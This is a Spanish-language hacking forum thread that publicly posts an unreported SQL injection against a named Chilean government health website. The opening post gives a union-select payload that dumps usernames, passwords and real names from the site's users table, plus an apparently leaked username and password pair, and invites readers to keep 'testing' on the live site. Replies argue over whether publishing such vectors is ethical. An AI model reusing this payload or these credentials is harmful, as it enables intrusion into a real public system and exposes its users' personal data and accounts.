SQLI http://webhosting.redsalud.gov.cl/

Iniciado por Muppet, Junio 27, 2013, 07:05:25 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Junio 27, 2013, 07:05:25 PM Ultima modificación: Enero 10, 2015, 01:13:57 PM por Expermicid


SQL:

Verctor:No tienes permitido ver los links. Registrarse o Entrar a mi cuenta union select group_concat(concat_ws(char(58),username,password,realname) SEPARATOR 0x7e) from users-- -c

Reportado: No

gerardo.flores:gf43

Entonces él dijo, "cruzad con vuestras tropas y atacad porque es lo único que le queda a nuestro pueblo...".

Te tomaste enserio lo que dijo matabarras? :P

No el es asi siempre.. jaja solo que no publica nada de lo que hace xD
Muy bueno! Saludos,, Cronos.-

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No el es asi siempre.. jaja solo que no publica nada de lo que hace xD
Muy bueno! Saludos,, Cronos.-

La verdad, y sin intenciones de atacar a nadie; yo tampoco lo haría-publicaría.

Convengamos que publicar inyecciones sql sin ninguna complejidad no es la gran cosa. Si al menos estuvieras bypasseando algún mecanismo de protección sería mas aceptable.

Lo hago publico con la finalidad de darle una mano a la gente que quiere aprender y ver vectores reales y puedan probar o hacerse a la idea de distintas formas de hacer sqli, y el plus se lo doy ya que son webs del gobierno y llegado el momento que haga el tiempito, voy a empesar a reportar todo mientras tanto y mientras no se reparen los fallos pueden ir testeando, he publicado otras sqli con waf bypass, para justamente ayudar a otras personas a experimentar y ver otros vectores. Varios amigos han podido aplicar otros metodos como double error y otros metodos de filtrado de waf del los cuales tambien he aprendido cosas muy utiles al estudiar sus vectores, y asi tanto yo como la gente que quiera investigar un poco mas podemos hacer un reflujo de conocimiento, y pasarnos vectores personalizados y nuevos para ir aprendiendo.

Ademas le doy un poco mas de vida a la sección!

Entonces él dijo, "cruzad con vuestras tropas y atacad porque es lo único que le queda a nuestro pueblo...".

Total mente de acuerdo bro! La única manera de aprender es con casos reales!

A mí este post me gusta porque es un SQLi, y eso ni mucho menos es un fallo de seguridad leve, y porque además no se trata de una panadería ni ferretería, sino una web gubernamental.
Lo de que se debe dar vida a la sección estoy completamente de acuerdo.
En cuanto al encontronazo con Matabarras, no discutan, él es un buen tío (lo digo de primerísima mano) y no publica ni la mitad de lo que encuentra, y le respeto tanto como a todos los demás miembros del staff y usuarios del foro.

En fin, en cuanto pueda daré yo también vida a la sección con unos pocos fallos guardados que tengo.
Saludos.
Contacto: @migueljimeno96 -

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Lo hago publico con la finalidad de darle una mano a la gente que quiere aprender y ver vectores reales y puedan probar o hacerse a la idea de distintas formas de hacer sqli, y el plus se lo doy ya que son webs del gobierno y llegado el momento que haga el tiempito, voy a empesar a reportar todo mientras tanto y mientras no se reparen los fallos pueden ir testeando, he publicado otras sqli con waf bypass, para justamente ayudar a otras personas a experimentar y ver otros vectores. Varios amigos han podido aplicar otros metodos como double error y otros metodos de filtrado de waf del los cuales tambien he aprendido cosas muy utiles al estudiar sus vectores, y asi tanto yo como la gente que quiera investigar un poco mas podemos hacer un reflujo de conocimiento, y pasarnos vectores personalizados y nuevos para ir aprendiendo.

Ademas le doy un poco mas de vida a la sección!

Saludos compa;

estoy totalmente de acuerdo con lo que dices; el compartir conocimientos e intercambiar ideas...!!!, haciendo asi que otro se interesen en el tema como los que se estaban realizando en los wargames donde se colocaban Retos con el fin meramente educativo... de escenarios reales...
para dejar volar la imaginacion y los conocimientos en cuanto a los diversos retos.., lo que si no comparto es la publicacion del vector... asi se pierde la magia, el encanto, no dejas que la curiosidad de como obtener el vector, y solo facilitas lameradas como me dijeron alguna vez con respecto a una web gubernamental...

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Lo hago publico con la finalidad de darle una mano a la gente que quiere aprender y ver vectores reales y puedan probar o hacerse a la idea de distintas formas de hacer sqli, y el plus se lo doy ya que son webs del gobierno y llegado el momento que haga el tiempito, voy a empesar a reportar todo mientras tanto y mientras no se reparen los fallos pueden ir testeando, he publicado otras sqli con waf bypass, para justamente ayudar a otras personas a experimentar y ver otros vectores. Varios amigos han podido aplicar otros metodos como double error y otros metodos de filtrado de waf del los cuales tambien he aprendido cosas muy utiles al estudiar sus vectores, y asi tanto yo como la gente que quiera investigar un poco mas podemos hacer un reflujo de conocimiento, y pasarnos vectores personalizados y nuevos para ir aprendiendo.

Ademas le doy un poco mas de vida a la sección!

Saludos compa;

estoy totalmente de acuerdo con lo que dices; el compartir conocimientos e intercambiar ideas...!!!, haciendo asi que otro se interesen en el tema como los que se estaban realizando en los wargames donde se colocaban Retos con el fin meramente educativo... de escenarios reales...
para dejar volar la imaginacion y los conocimientos en cuanto a los diversos retos.., lo que si no comparto es la publicacion del vector... asi se pierde la magia, el encanto, no dejas que la curiosidad de como obtener el vector, y solo facilitas lameradas como me dijeron alguna vez con respecto a una web gubernamental...

yo creo q las lammereadas van en la etica de cada persona, como vieron encontre varios sqli en web del gobierno y no he hecho absolutamente ningun daño, el vector es obligatorio en las normas de hacking showoff, de hay en mas quien lo utilice para hacer daño, queda en el si lo meten preso... ahora yo propongo algo, por ej si yo muestro un vector union select, porq alguien mas no intenta un double query? o si yo llego solo hasta mostrar la version porq tiene waf porq no tomar el vector y ver si pueden saltar el waf... e ir compartiendo los vectores q vamos encontrando con el fin de aprender otras perspectivas y pensamientos de como afrontar el problema

Entonces él dijo, "cruzad con vuestras tropas y atacad porque es lo único que le queda a nuestro pueblo...".